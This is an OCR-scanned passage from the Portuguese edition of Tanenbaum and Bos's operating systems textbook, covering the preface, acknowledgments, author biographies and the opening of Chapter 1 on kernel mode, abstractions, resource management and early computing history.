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sta quarta edição de Sistemas operacionais moder- 

nos é diferente da anterior em uma série de aspec- 

tos. Existem várias pequenas mudanças em toda a 

parte, para que o material fique atualizado, visto que 

os sistemas não ficam parados. O capítulo sobre Sis- 
temas Operacionais Multimídia foi passado para a sala 
virtual, principalmente para dar espaço para o material 
novo e evitar que o livro cresça que ficar de um tama- 
nho gigantesco. O capítulo sobre Windows Vista foi re- 
movido completamente, pois o Vista não foi o sucesso 
que a Microsoft esperava. O capítulo sobre o Symbian 
também foi removido, pois o Symbian não está mais 
disponível de modo generalizado. Porém, o material so- 
bre o Vista foi substituído pelo Windows 8 e o Symbian, 
pelo Android. Além disso, acrescentamos um capítulo 
totalmente novo, sobre virtualização e a nuvem. Aqui 
está uma listagem das mudanças em cada capítulo. 





e O Capítulo 1 foi bastante modificado e atualiza- 
do em muitos pontos, mas, com a exceção de uma 
nova seção sobre computadores móveis, nenhuma 
seção importante foi acrescentada ou removida. 

e O Capítulo 2 foi atualizado, com o material mais 
antigo sendo removido e algum material novo 
acrescentado. Por exemplo, acrescentamos a pri- 
mitiva de sincronização futex e uma seção sobre 
como evitar completamente o uso de travas com 
Read-Copy-Update. 

e O Capítulo 3 agora tem um foco maior sobre o 
hardware moderno e menos ênfase na segmenta- 
ção e no MULTICS. 

e No Capítulo 4, removemos CD-ROMs, pois já 
não são muito comuns, e os substituímos por 
soluções mais modernas (como unidades flash). 








Além disso, acrescentamos o RAID nível 6 à se- 
ção sobre RAID. 

O Capítulo 5 passou por diversas mudanças. 
Dispositivos mais antigos, como monitores 
CRT e CD-ROMs, foram removidos, enquanto 
novas tecnologias, como touch screens, foram 
acrescentadas. 

O Capítulo 6 não sofreu muita alteração. O tópi- 
co sobre impasses é bastante estável, com poucos 
resultados novos. 

O Capítulo 7 é completamente novo. Ele abor- 
da os tópicos importantes de virtualização e a 
nuvem. Como um estudo de caso, a seção sobre 
VMware foi acrescentada. 

O Capítulo 8 é uma versão atualizada do material 
anterior sobre sistemas multiprocessadores. Há 
mais ênfase em sistemas multinúcleos agora, que 
têm se tornado cada vez mais importantes nos úl- 
timos anos. A consistência de cache recentemente 
tornou-se uma questão mais importante e agora 
foi incluída aqui. 

O Capítulo 9 foi bastante revisado e reorganiza- 
do, com um material novo considerável sobre a 
exploração de erros do código, malware e defe- 
sas contra eles. Ataques como dereferências de 
ponteiro nulo e transbordamentos de buffer são 
tratados com mais detalhes. Mecanismos de defe- 
sa, incluindo canários, o bit NX e randomização 
do espaço de endereços são tratados agora com 
detalhes, pois são as formas como os invasores 
tentam derrotá-los. 

O Capítulo 10 passou por uma mudança im- 
portante. O material sobre UNIX e Linux foi 
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atualizado, mas o acréscimo importante aqui 
é uma seção nova e extensa sobre o sistema 
operacional Android, que é muito comum em 
smartphones e tablets. 

e O Capítulo 11 na terceira edição era sobre o 
Windows Vista. Foi substituído por um sobre 
o Windows 8, especificamente o Windows 8.1. 
Ele torna o tratamento do Windows bem mais 
atualizado. 

e O Capítulo 12 é uma versão revisada do Capítulo 
13 da edição anterior. 

* O Capítulo 13 é uma lista totalmente atualizada 
de leituras sugeridas. Além disso, a lista de refe- 
rências foi atualizada, com entradas para 223 no- 
vos trabalhos publicados depois que foi lançada a 
terceira edição deste livro. 

* Além disso, as seções sobre pesquisas em todo o 
livro foram refeitas do zero, para refletir a pes- 
quisa mais recente sobre sistemas operacionais. 
Além do mais, novos problemas foram acrescen- 
tados a todos os capítulos. 


Muitas pessoas me ajudaram na quarta edição. Em 
primeiro lugar, o Prof. Herbert Bos, da Vrije Universi- 
teit de Amsterdã, foi acrescentado como coautor. Ele é 
especialista em segurança, UNIX e sistemas em geral, 
e é ótimo tê-lo entre nós. Ele escreveu grande parte do 
material novo, exceto o que for indicado a seguir. 

Nossa editora, Tracy Johnson, realizou um trabalho 
maravilhoso, como sempre, encontrando colaboradores, 
juntando todas as partes, apagando incêndios e assegu- 
rando que o projeto seguisse no prazo. Também tive- 
mos a sorte de ter de volta nossa editora de produção 
de muito tempo, Camille Trentacoste. Suas habilidades 
em tantas áreas salvaram o dia em diversas ocasiões. 
Estamos felizes por tê-la de volta após uma ausência de 
vários anos. Carole Snyder realizou um belo trabalho 
coordenando as diversas pessoas envolvidas no livro. 

O material no Capítulo 7 sobre VMware (na Seção 
7.12) foi escrito por Edouard Bugnion, da EPFL em 
Lausanne, Suíça. Ed foi um dos fundadores da empresa 
VMware e conhece este material melhor que qualquer 
outra pessoa no mundo. Agradecemos muito a ele por 
fornecê-lo a nós. 

Ada Gavrilovska, da Georgia Tech, especialista nos 
detalhes internos do Linux, atualizou o Capítulo 10 a 
partir da terceira edição, que também foi escrito por 
ela. O material sobre Android no Capítulo 10 foi escrito 
por Dianne Hackborn, da Google, uma das principais 
desenvolvedoras do sistema Android. Android é o prin- 
cipal sistema operacional nos smartphones, e portanto 


somos muito gratos a Dianne por ter nos ajudado. O 
Capítulo 10 agora está muito grande e detalhado, mas os 
fãs do UNIX, Linux e Android podem aprender muito 
com ele. Talvez valha a pena observar que o maior e 
mais técnico capítulo do livro foi escrito por duas mu- 
lheres. Só fizemos a parte fácil. 

Mas não nos esquecemos do Windows. Dave Pro- 
bert, da Microsoft, atualizou o Capítulo 11 a partir da 
edição anterior do livro. Desta vez, o capítulo aborda 
o Windows 8.1 com detalhes. Dave tem grande conhe- 
cimento sobre o Windows e perspicácia suficiente para 
apontar as diferenças entre pontos nos quais a Microsoft 
acertou e errou. Os fãs do Windows certamente aprecia- 
rão este capítulo. 

Este livro está muito melhor como resultado do tra- 
balho de todos esses colaboradores especialistas. No- 
vamente, gostaríamos de agradecer a todos eles por sua 
ajuda inestimável. 

Também tivemos a sorte de ter diversos revisores que 
leram o manuscrito e sugeriram novos problemas para 
o final dos capítulos. São eles Trudy Levine, Shivakant 
Mishra, Krishna Sivalingam e Ken Wong. Steve Arms- 
trong criou as apresentações em PowerPoint originais 
para os instrutores que utilizam o livro em seus cursos. 

Em geral, copidesques e revisores de provas não 
entram nos agradecimentos, mas Bob Lentz (copides- 
que) e Joe Ruddick (revisor de provas) realizaram um 
trabalho excepcional. Joe, em particular, pode achar a 
diferença entre um ponto romano e um ponto em itálico 
a 20 metros de distância. Mesmo assim, os autores as- 
sumem toda a responsabilidade por qualquer erro que 
venha a ser encontrado no livro. Os leitores que obser- 
varem quaisquer erros poderão entrar em contato com 
um dos autores. 

Por último, mas não menos importante, agradeço 
a Barbara e Marvin, maravilhosos como sempre, cada 
um de modo único e especial. Daniel e Matilde foram 
ótimos acréscimos à nossa família. Aron e Nathan são 
crianças maravilhosas e Olivia é um tesouro. E, claro, 
gostaria de agradecer a Suzanne por seu amor e paci- 
ência, para não falar de todo druiven, kersen e sinaasa- 
ppelsap, além de outros produtos agrícolas. (AST) 

Mais importante que tudo, gostaria de agradecer a 
Marieke, Duko e Jip. Marieke por seu amor e por su- 
portar comigo todas as noites em que eu trabalhei neste 
livro, e Duko e Jip por me afastarem disso e mostrarem 
que existem coisas mais importantes na vida. Como Mi- 
necraft. (HB) 


Andrew S. Tanenbaum 
Herbert Bos 





Andrew S. Tanenbaum é bacharel em ciências 
pelo MIT e Ph.D. pela Universidade da Califórnia em 
Berkeley. Atualmente é professor de ciências da com- 
putação na Vrije Universiteit em Amsterdã, nos Países 
Baixos. Foi reitor da Advanced School for Computing 
and Imaging, uma escola de pós-graduação interuniver- 
sitária que realiza pesquisas sobre sistemas paralelos, 
distribuídos e de processamento de imagens avançados. 
Também foi professor da Academia Real de Artes e Ci- 
ências dos Países Baixos, o que o impediu de tornar-se 
um burocrata. Além disso, recebeu o renomado Europe- 
an Research Council Advanced Grant. 

No passado, fez pesquisas sobre compiladores, sis- 
temas operacionais, sistemas de redes e sistemas dis- 
tribuídos. Atualmente, concentra-se em pesquisas sobre 
sistemas operacionais confiáveis e seguros. Esses proje- 
tos de pesquisa levaram a mais de 175 artigos avaliados 
em periódicos e conferências. Tanenbaum é também au- 
tor e coautor de cinco livros, que foram traduzidos para 
20 idiomas, do basco ao tailandês, e são utilizados em 
universidades do mundo todo. No total, são 163 versões 
(combinações de idiomas + edições) de seus livros. 

Tanenbaum também criou um volume considerável 
de softwares, especialmente o MINIX, um pequeno clo- 
ne do UNIX. Ele foi a inspiração direta para o Linux 
e a plataforma sobre a qual o Linux foi desenvolvido 
inicialmente. A versão atual do MINIX, denominada 
MINIX 3, agora visa ser um sistema operacional extre- 
mamente confiável e seguro. O Prof. Tanenbaum con- 
siderará seu trabalho encerrado quando nenhum usuário 
tiver qualquer ideia do que significa uma falha do siste- 
ma operacional. O MINIX 3 é um projeto open-source 











em andamento, ao qual você está convidado a contri- 
buir. Entre em <www.minix3.org> para baixar uma 
cópia gratuita do MINIX 3 e fazer um teste. Existem 
versões para x86 e ARM. 

Os alunos de Ph.D. do professor Tanenbaum segui- 
ram caminhos gloriosos. Ele tem muito orgulho deles. 
Nesse sentido, ele é um orientador coruja. 

Associado à ACM e ao IEEE e membro da Academia 
Real de Artes e Ciências dos Países Baixos, ele recebeu 
vários prêmios científicos da ACM, IEEE e USENIX. 
Se você tiver curiosidade a respeito deles, consulte sua 
página na Wikipedia. Ele também possui dois doutora- 
dos honorários. 

Herbert Bos possui mestrado pela Twente Univer- 
sity e doutorado pelo Cambridge University Computer 
Laboratory no Reino Unido. Desde então, tem traba- 
lhado bastante em arquiteturas de E/S confiáveis e efi- 
cientes para sistemas operacionais como Linux, mas 
também na pesquisa de sistemas baseados no MINIX 
3. Atualmente, é professor de Segurança de Sistemas 
e Redes no Departamento de Ciência da Computação 
da Vrije Universiteit, em Amsterdã, nos Países Baixos. 
Seu principal campo de pesquisa está na segurança de 
sistemas. Com seus alunos, ele trabalha com novas 
maneiras de detectar e impedir ataques, analisar e re- 
verter software nocivo planejado e reduzir os botnets 
(infraestruturas maliciosas que podem se espalhar por 
milhões de computadores). Em 2011, obteve um ERC 
Starting Grant por sua pesquisa em engenharia rever- 
sa. Três de seus alunos receberam o Roger Needham 
Award por melhor tese de doutorado da Europa em 
sistemas. 
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Sala Virtual 


| Na Sala Virtual deste livro (sv.pearson.com.br), professores e estudantes podem acessar os seguintes ma- 
teriais adicionais a qualquer momento: 
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= 1 ção 


m computador moderno consiste em um ou mais 
processadores, alguma memória principal, discos, 
impressoras, um teclado, um mouse, um monitor, 
interfaces de rede e vários outros dispositivos de 
entrada e saída. Como um todo, trata-se de um 
sistema complexo. Se todo programador de aplicativos 
tivesse de compreender como todas essas partes funcio- 
nam em detalhe, nenhum código jamais seria escrito. 
Além disso, gerenciar todos esses componentes e usá- 
-los de maneira otimizada é um trabalho extremamente 
desafiador. Por essa razão, computadores são equipados 
com um dispositivo de software chamado de sistema 
operacional, cuja função é fornecer aos programas 
do usuário um modelo do computador melhor, mais 
simples e mais limpo, assim como lidar com o geren- 
ciamento de todos os recursos mencionados. Sistemas 
operacionais é o assunto deste livro. 
Amaioria dos leitores já deve ter tido alguma expe- 
riência com um sistema operacional como Windows, 


geil: 7ER Onde o sistema operacional se encaixa. 
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Linux, FreeBSD, ou OS X, mas as aparências podem 
ser enganadoras. O programa com o qual os usuá- 
rios interagem, normalmente chamado de shell (ou 
interpretador de comandos) quando ele é baseado em 
texto e de GUI (Graphical User Interface) quando 
ele usa ícones, na realidade não é parte do sistema 
operacional, embora use esse sistema para realizar o 
seu trabalho. 

Uma visão geral simplificada dos principais com- 
ponentes em discussão aqui é dada na Figura 1.1, em 
que vemos o hardware na parte inferior. Ele consiste em 
chips, placas, discos, um teclado, um monitor e objetos 
físicos similares. Em cima do hardware está o software. 
A maioria dos computadores tem dois modos de ope- 
ração: modo núcleo e modo usuário. O sistema opera- 
cional, a peça mais fundamental de software, opera em 
modo núcleo (também chamado modo supervisor). 
Nesse modo ele tem acesso completo a todo o hardware 
e pode executar qualquer instrução que a máquina for 
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capaz de executar. O resto do software opera em modo 
usuário, no qual apenas um subconjunto das instruções 
da máquina está disponível. Em particular, aquelas ins- 
truções que afetam o controle da máquina ou realizam 
E/S (Entrada/Saída) são proibidas para programas de 
modo usuário. Retornaremos à diferença entre modo 
núcleo e modo usuário repetidamente neste livro. Ela 
exerce um papel crucial no modo como os sistemas ope- 
racionais funcionam. 

O programa de interface com o usuário, shell ou 
GUI, é o nível mais inferior de software de modo usu- 
ário, e permite que ele inicie outros programas, como 
um navegador web, leitor de e-mail, ou reprodutor de 
música. Esses programas, também, utilizam bastante o 
sistema operacional. 

O posicionamento do sistema operacional é mostrado 
na Figura 1.1. Ele opera diretamente sobre o hardware e 
proporciona a base para todos os outros softwares. 

Uma distinção importante entre o sistema opera- 
cional e o software normal (modo usuário) é que se 
um usuário não gosta de um leitor de e-mail em parti- 
cular, ele é livre para conseguir um leitor diferente ou 
escrever o seu próprio, se assim quiser; ele não é livre 
para escrever seu próprio tratador de interrupção de 
relógio, o qual faz parte do sistema operacional e é 
protegido por hardware contra tentativas dos usuários 
de modificá-lo. 

Essa distinção, no entanto, às vezes é confusa em 
sistemas embarcados (que podem não ter o modo nú- 
cleo) ou interpretados (como os baseados em Java 
que usam interpretação, não hardware, para separar os 
componentes). 

Também, em muitos sistemas há programas que 
operam em modo usuário, mas ajudam o sistema 
operacional ou realizam funções privilegiadas. Por 
exemplo, muitas vezes há um programa que permite 
aos usuários que troquem suas senhas. Não faz parte 
do sistema operacional e não opera em modo núcleo, 
mas claramente realiza uma função sensível e precisa 
ser protegido de uma maneira especial. Em alguns 
sistemas, essa ideia é levada ao extremo, e partes 
do que é tradicionalmente entendido como sendo o 
sistema operacional (como o sistema de arquivos) é 
executado em espaço do usuário. Em tais sistemas, é 
difícil traçar um limite claro. Tudo o que está sendo 
executado em modo núcleo faz claramente parte do 
sistema operacional, mas alguns programas executa- 
dos fora dele também podem ser considerados uma 
parte dele, ou pelo menos estão associados a ele de 
modo próximo. 


Os sistemas operacionais diferem de programas 
de usuário (isto é, de aplicativos) de outras maneiras 
além de onde estão localizados. Em particular, eles 
são enormes, complexos e têm vida longa. O código- 
-fonte do coração de um sistema operacional como 
Linux ou Windows tem cerca de cinco milhões de 
linhas. Para entender o que isso significa, considere 
como seria imprimir cinco milhões de linhas em for- 
ma de livro, com 50 linhas por página e 1.000 páginas 
por volume. Seriam necessários 100 volumes para 
listar um sistema operacional desse tamanho — em 
essência, uma estante de livros inteira. Imagine-se 
conseguindo um trabalho de manutenção de um sis- 
tema operacional e no primeiro dia seu chefe o leva 
até uma estante de livros com o código e diz: “Você 
precisa aprender isso”. E isso é apenas para a parte 
que opera no núcleo. Quando bibliotecas comparti- 
lhadas essenciais são incluídas, o Windows tem bem 
mais de 70 milhões de linhas de código ou 10 a 20 es- 
tantes de livros. E isso exclui softwares de aplicação 
básicos (do tipo Windows Explorer, Windows Media 
Player e outros). 

Deve estar claro agora por que sistemas operacionais 
têm uma longa vida — eles são dificílimos de escrever, e 
tendo escrito um, o proprietário reluta em jogá-lo fora e 
começar de novo. Em vez disso, esses sistemas evoluem 
por longos períodos de tempo. O Windows 95/98/Me 
era basicamente um sistema operacional e o Windows 
NT/2000/XP/Vista/Windows 7 é outro. Eles são pareci- 
dos para os usuários porque a Microsoft tomou todo o 
cuidado para que a interface com o usuário do Windows 
2000/XP/Vista/Windows 7 fosse bastante parecida com 
a do sistema que ele estava substituindo, majoritaria- 
mente o Windows 98. Mesmo assim, havia razões muito 
boas para a Microsoft livrar-se do Windows 98. Chega- 
remos a elas quando estudarmos o Windows em detalhe 
no Capítulo 11. 

Além do Windows, o outro exemplo fundamental 
que usaremos ao longo deste livro é o UNIX e suas va- 
riáveis e clones. Ele também evoluiu com os anos, com 
versões como System V, Solaris e FreeBSD sendo deri- 
vadas do sistema original, enquanto o Linux possui um 
código base novo, embora muito proximamente mode- 
lado no UNIX e muito compatível com ele. Usaremos 
exemplos do UNIX neste livro e examinaremos o Linux 
em detalhes no Capítulo 10. 

Neste capítulo abordaremos brevemente uma série 
de aspectos fundamentais dos sistemas operacionais, in- 
cluindo o que eles são, sua história, que tipos há por aí, 
alguns dos conceitos básicos e sua estrutura. Voltaremos 


mais detalhadamente a muitos desses tópicos importan- 
tes em capítulos posteriores. 


1.1 O que é um sistema operacional? 


É difícil dizer com absoluta precisão o que é um 
sistema operacional, além de ele ser o software que 
opera em modo núcleo — e mesmo isso nem sempre 
é verdade. Parte do problema é que os sistemas ope- 
racionais realizam duas funções essencialmente não 
relacionadas: fornecer a programadores de aplicati- 
vos (e programas aplicativos, claro) um conjunto de 
recursos abstratos limpo em vez de recursos confusos 
de hardware, e gerenciar esses recursos de hardware. 
Dependendo de quem fala, você poderá ouvir mais a 
respeito de uma função do que de outra. Examinemos 
as duas então. 


1.1.1 O sistema operacional como uma máquina 
estendida 


A arquitetura (conjunto de instruções, organização 
de memória, E/S e estrutura de barramento) da maioria 
dos computadores em nível de linguagem de máquina 
é primitiva e complicada de programar, especialmente 
para entrada/saída. Para deixar esse ponto mais claro, 
considere os discos rígidos modernos SATA (Serial 
ATA) usados na maioria dos computadores. Um livro 
(ANDERSON, 2007) descrevendo uma versão inicial 
da interface do disco — o que um programador deveria 
saber para usar o disco —, tinha mais de 450 páginas. 
Desde então, a interface foi revista múltiplas vezes e é 
mais complicada do que em 2007. É claro que nenhum 
programador são iria querer lidar com esse disco em ni- 
vel de hardware. Em vez disso, um software, chamado 
driver de disco, lida com o hardware e fornece uma 
interface para ler e escrever blocos de dados, sem entrar 
nos detalhes. Sistemas operacionais contêm muitos dri- 
vers para controlar dispositivos de E/S. 

Mas mesmo esse nível é baixo demais para a maioria 
dos aplicativos. Por essa razão, todos os sistemas ope- 
racionais fornecem mais um nível de abstração para se 
utilizarem discos: arquivos. Usando essa abstração, os 
programas podem criar, escrever e ler arquivos, sem ter 
de lidar com os detalhes complexos de como o hardware 
realmente funciona. 

Essa abstração é a chave para gerenciar toda essa 
complexidade. Boas abstrações transformam uma ta- 
refa praticamente impossível em duas tarefas gerenci- 
áveis. A primeira é definir e implementar as abstrações. 
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A segunda é utilizá-las para solucionar o problema à 
mão. Uma abstração que quase todo usuário de com- 
putadores compreende é o arquivo, como mencionado 
anteriormente. Trata-se de um fragmento de informação 
útil, como uma foto digital, uma mensagem de e-mail, 
música ou página da web salvas. É muito mais facil li- 
dar com fotos, e-mails, músicas e páginas da web do 
que com detalhes de discos SATA (ou outros). A função 
dos sistemas operacionais é criar boas abstrações e en- 
tão implementar e gerenciar os objetos abstratos criados 
desse modo. Neste livro, falaremos muito sobre abstra- 
ções. Elas são uma das chaves para compreendermos os 
sistemas operacionais. 

Esse ponto é tão importante que vale a pena repe- 
ti-lo em outras palavras. Com todo o devido respeito 
aos engenheiros industriais que projetaram com tanto 
cuidado o Macintosh, o hardware é feio. Processadores 
reais, memórias, discos e outros dispositivos são muito 
complicados e apresentam interfaces difíceis, desajei- 
tadas, idiossincráticas e inconsistentes para as pessoas 
que têm de escrever softwares para elas utilizarem. Às 
vezes isso decorre da necessidade de haver compatibi- 
lidade com a versão anterior do hardware, ou, então, 
é uma tentativa de poupar dinheiro. Muitas vezes, no 
entanto, os projetistas de hardware não percebem (ou 
não se importam) os problemas que estão causando ao 
software. Uma das principais tarefas dos sistemas ope- 
racionais é esconder o hardware e em vez disso apresen- 
tar programas (e seus programadores) com abstrações 
de qualidade, limpas, elegantes e consistentes com as 
quais trabalhar. Sistemas operacionais transformam o 
feio em belo, como mostrado na Figura 1.2. 

Deve ser observado que os clientes reais dos siste- 
mas operacionais são os programas aplicativos (via pro- 
gramadores de aplicativos, é claro). São eles que lidam 
diretamente com as abstrações fornecidas pela interfa- 
ce do usuário, seja uma linha de comandos (shell) ou 
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uma interface gráfica. Embora as abstrações na inter- 
face com o usuário possam ser similares às abstrações 
fornecidas pelo sistema operacional, nem sempre esse é 
o caso. Para esclarecer esse ponto, considere a área de 
trabalho normal do Windows e o prompt de comando 
orientado a linhas. Ambos são programas executados no 
sistema operacional Windows e usam as abstrações que 
o Windows fornece, mas eles oferecem interfaces de 
usuário muito diferentes. De modo similar, um usuário 
de Linux executando Gnome ou KDE vê uma interface 
muito diferente daquela vista por um usuário Linux tra- 
balhando diretamente sobre o X Window System, mas 
as abstrações do sistema operacional subjacente são as 
mesmas em ambos os casos. 

Neste livro, esmiuçaremos o estudo das abstrações 
fornecidas aos programas aplicativos, mas falaremos 
bem menos sobre interfaces com o usuário. Esse é um 
assunto grande e importante, mas apenas perifericamente 
relacionado aos sistemas operacionais. 


1.1.2 O sistema operacional como um 
gerenciador de recursos 


O conceito de um sistema operacional como fun- 
damentalmente fornecendo abstrações para programas 
aplicativos é uma visão top-down (abstração de cima 
para baixo). Uma visão alternativa, bottom-up (abstra- 
ção de baixo para cima), sustenta que o sistema ope- 
racional está ali para gerenciar todas as partes de um 
sistema complexo. Computadores modernos consistem 
de processadores, memórias, temporizadores, discos, 
dispositivos apontadores do tipo mouse, interfaces de 
rede, impressoras e uma ampla gama de outros disposi- 
tivos. Na visão bottom-up, a função do sistema opera- 
cional é fornecer uma alocação ordenada e controlada 
dos processadores, memórias e dispositivos de E/S en- 
tre os vários programas competindo por eles. 

Sistemas operacionais modernos permitem que múl- 
tiplos programas estejam na memória e sejam executa- 
dos ao mesmo tempo. Imagine o que aconteceria se três 
programas executados em um determinado computador 
tentassem todos imprimir sua saída simultaneamente na 
mesma impressora. As primeiras linhas de impressão 
poderiam ser do programa 1, as seguintes do programa 
2, então algumas do programa 3 e assim por diante. O 
resultado seria o caos absoluto. O sistema operacional 
pode trazer ordem para o caos em potencial armaze- 
nando temporariamente toda a saída destinada para a 
impressora no disco. Quando um programa é finaliza- 
do, o sistema operacional pode então copiar a sua saí- 
da do arquivo de disco onde ele foi armazenado para a 


impressora, enquanto ao mesmo tempo o outro progra- 
ma pode continuar a gerar mais saída, alheio ao fato de 
que a saída não está realmente indo para a impressora 
(ainda). 

Quando um computador (ou uma rede) tem mais 
de um usuário, a necessidade de gerenciar e proteger a 
memória, dispositivos de E/S e outros recursos é ainda 
maior, tendo em vista que os usuários poderiam interferir 
um com o outro de outra maneira. Além disso, usuá- 
rios muitas vezes precisam compartilhar não apenas o 
hardware, mas a informação (arquivos, bancos de dados 
etc.) também. Resumindo, essa visão do sistema ope- 
racional sustenta que a sua principal função é manter 
um controle sobre quais programas estão usando qual 
recurso, conceder recursos requisitados, contabilizar o 
seu uso, assim como mediar requisições conflitantes de 
diferentes programas e usuários. 

O gerenciamento de recursos inclui a multiplexa- 
ção (compartilhamento) de recursos de duas maneiras 
diferentes: no tempo e no espaço. Quando um recurso 
é multiplexado no tempo, diferentes programas ou usu- 
ários se revezam usando-o. Primeiro, um deles usa o 
recurso, então outro e assim por diante. Por exemplo, 
com apenas uma CPU e múltiplos programas queren- 
do ser executados nela, o sistema operacional primeiro 
aloca a CPU para um programa, então, após ele ter sido 
executado por tempo suficiente, outro programa passa a 
fazer uso da CPU, então outro, e finalmente o primeiro 
de novo. Determinar como o recurso é multiplexado no 
tempo — quem vai em seguida e por quanto tempo — é 
a tarefa do sistema operacional. Outro exemplo da mul- 
tiplexação no tempo é o compartilhamento da impresso- 
ra. Quando múltiplas saídas de impressão estão na fila 
para serem impressas em uma única impressora, uma 
decisão tem de ser tomada sobre qual deve ser impressa 
em seguida. 

O outro tipo é a multiplexação de espaço. Em vez 
de os clientes se revezarem, cada um tem direito a uma 
parte do recurso. Por exemplo, a memória principal é 
normalmente dividida entre vários programas sendo 
executados, de modo que cada um pode ser residente ao 
mesmo tempo (por exemplo, a fim de se revezar usan- 
do a CPU). Presumindo que há memória suficiente para 
manter múltiplos programas, é mais eficiente manter 
vários programas na memória ao mesmo tempo do que 
dar a um deles toda ela, especialmente se o programa 
precisa apenas de uma pequena fração do total. É cla- 
ro, isso gera questões de justiça, proteção e assim por 
diante, e cabe ao sistema operacional solucioná-las. Ou- 
tro recurso que é multiplexado no espaço é o disco. Em 
muitos sistemas um único disco pode conter arquivos de 


muitos usuários ao mesmo tempo. Alocar espaço de dis- 
co e controlar quem está usando quais blocos do disco é 
uma tarefa típica do sistema operacional. 


1.2 História dos sistemas operacionais 


Sistemas operacionais têm evoluído ao longo dos 
anos. Nas seções a seguir examinaremos brevemente 
alguns dos destaques dessa evolução. Tendo em vista 
que os sistemas operacionais estiveram historicamen- 
te muito vinculados à arquitetura dos computadores na 
qual eles são executados, examinaremos sucessivas ge- 
rações de computadores para ver como eram seus sis- 
temas operacionais. Esse mapeamento de gerações de 
sistemas operacionais em relação às gerações de com- 
putadores é impreciso, mas proporciona alguma estru- 
tura onde de outra maneira não haveria nenhuma, 

A progressão apresentada a seguir é em grande parte 
cronológica, embora atribulada. Novos desenvolvimen- 
tos não esperaram que os anteriores tivessem termina- 
do adequadamente antes de começarem. Houve muita 
sobreposição, sem mencionar muitas largadas falsas e 
becos sem saída. Tome-a como um guia, não como a 
palavra final. 

O primeiro computador verdadeiramente digital 
foi projetado pelo matemático inglês Charles Babbage 
(1792-1871). Embora Babbage tenha gasto a maior 
parte de sua vida e fortuna tentando construir a “má- 
quina analítica”, nunca conseguiu colocá-la para fun- 
cionar para valer porque ela era puramente mecânica, e 
a tecnologia da época não conseguia produzir as rodas, 
acessórios e engrenagens de alta precisão de que ele 
precisava. Desnecessário dizer que a máquina analítica 
não tinha um sistema operacional. 

Como um dado histórico interessante, Babbage perce- 
beu que ele precisaria de um software para sua máquina 
analítica, então ele contratou uma jovem chamada Ada 
Lovelace, que era a filha do famoso poeta inglês Lord 
Byron, como a primeira programadora do mundo. A lin- 
guagem de programação Ada” é uma homenagem a ela. 


1.2.1 A primeira geração (1945-1955): válvulas 


Após os esforços malsucedidos de Babbage, pouco 
progresso foi feito na construção de computadores di- 
gitais até o período da Segunda Guerra Mundial, que 
estimulou uma explosão de atividade. O professor John 
Atanasoff e seu aluno de graduação Clifford Berry 
construíram o que hoje em dia é considerado o primei- 
ro computador digital funcional na Universidade do 


Capítulo 1 INTRODUÇÃO | B 


Estado de Iowa. Ele usava 300 válvulas. Mais ou menos 
na mesma época, Konrad Zuse em Berlim construiu o 
computador Z3 a partir de relés eletromagnéticos. Em 
1944, o Colossus foi construido e programado por um 
grupo de cientistas (incluindo Alan Turing) em Bletch- 
ley Park, Inglaterra, o Mark I foi construído por Ho- 
ward Aiken, em Harvard, e o ENIAC foi construído por 
William Mauchley e seu aluno de graduação J. Presper 
Eckert na Universidade da Pensilvânia. Alguns eram bi- 
nários, outros usavam válvulas e ainda outros eram pro- 
gramáveis, mas todos eram muito primitivos e levavam 
segundos para realizar mesmo o cálculo mais simples. 

No início, um único grupo de pessoas (normalmente 
engenheiros) projetava, construía, programava, operava 
e mantinha cada máquina. Toda a programação era feita 
em código de máquina absoluto, ou, pior ainda, ligan- 
do circuitos elétricos através da conexão de milhares de 
cabos a painéis de ligações para controlar as funções 
básicas da máquina. Linguagens de programação eram 
desconhecidas (mesmo a linguagem de montagem era 
desconhecida). Ninguém tinha ouvido falar ainda de 
sistemas operacionais. O modo usual de operação con- 
sistia na reserva pelo programador de um bloco de tem- 
po na ficha de registro na parede, então ele descer até a 
sala de máquinas, inserir seu painel de programação no 
computador e passar as horas seguintes torcendo para 
que nenhuma das cerca de 20.000 válvulas queimasse 
durante a operação. Virtualmente todos os problemas 
eram cálculos numéricos e matemáticos diretos e sim- 
ples, como determinar tabelas de senos, cossenos e lo- 
garitmos, ou calcular trajetórias de artilharia. 

No início da década de 1950, a rotina havia melho- 
rado de certa maneira com a introdução dos cartões 
perfurados. Era possível agora escrever programas em 
cartões e lê-los em vez de se usarem painéis de progra- 
mação; de resto, o procedimento era o mesmo. 


1.2.2 A segunda geração (1955-1965): 
transistores e sistemas em lote (batch) 


A introdução do transistor em meados dos anos 
1950 mudou o quadro radicalmente. Os computadores 
tornaram-se de tal maneira confiáveis que podiam ser 
fabricados e vendidos para clientes dispostos a pagar 
por eles com a expectativa de que continuariam a fun- 
cionar por tempo suficiente para realizar algum trabalho 
útil. Pela primeira vez, havia uma clara separação entre 
projetistas, construtores, operadores, programadores e 
pessoal de manutenção. 

Essas máquinas — então chamadas de computado- 
res de grande porte (mainframes) —, ficavam isoladas 
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em salas grandes e climatizadas, especialmente desig- 
nadas para esse fim, com equipes de operadores pro- 
fissionais para operá-las. Apenas grandes corporações 
ou importantes agências do governo ou universidades 
conseguiam pagar o alto valor para tê-las. Para executar 
uma tarefa [isto é, um programa ou conjunto de progra- 
mas], um programador primeiro escrevia o programa no 
papel [em FORTRAN ou em linguagem de montagem 
(assembly)], então o perfurava nos cartões. Ele levava 
então o maço de cartões até a sala de entradas e o pas- 
sava a um dos operadores e ia tomar um café até que a 
saída estivesse pronta. 

Quando o computador terminava qualquer tarefa 
que ele estivesse executando no momento, um operador 
ia até a impressora, pegava a sua saída e a levava até 
a sala de saídas a fim de que o programador pudesse 
buscá-la mais tarde. Então ele pegava um dos maços de 
cartões que haviam sido levados da sala de entradas e 
o colocava para a leitura. Se o compilador FORTRAN 
fosse necessário, o operador teria de tirá-lo de um porta- 
-arquivos e fazer a leitura. Muito tempo do computador 
era desperdiçado enquanto os operadores caminhavam 
em torno da sala de máquinas. 

Dado o alto custo do equipamento, não causa surpre- 
sa que as pessoas logo procuraram maneiras de reduzir 
o tempo desperdiçado. A solução geralmente adotada 
era o sistema em lote (batch). A ideia por trás disso era 
reunir um lote de tarefas na sala de entradas e então pas- 
sá-lo para uma fita magnética usando um computador 
pequeno e (relativamente) barato, como um IBM 1401, 
que era muito bom na leitura de cartões, cópia de fitas e 
impressão de saídas, mas ruim em cálculos numéricos. 
Outras máquinas mais caras, como o IBM 7094, eram 


[FIGURA 1.3] Um sistema em lote (batch) antigo. 
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(b) O 1401 lia o lote de tarefas em uma fita. 

(c) O operador levava a fita de entrada para o 7094. 
(d) O 7094 executava o processamento. 

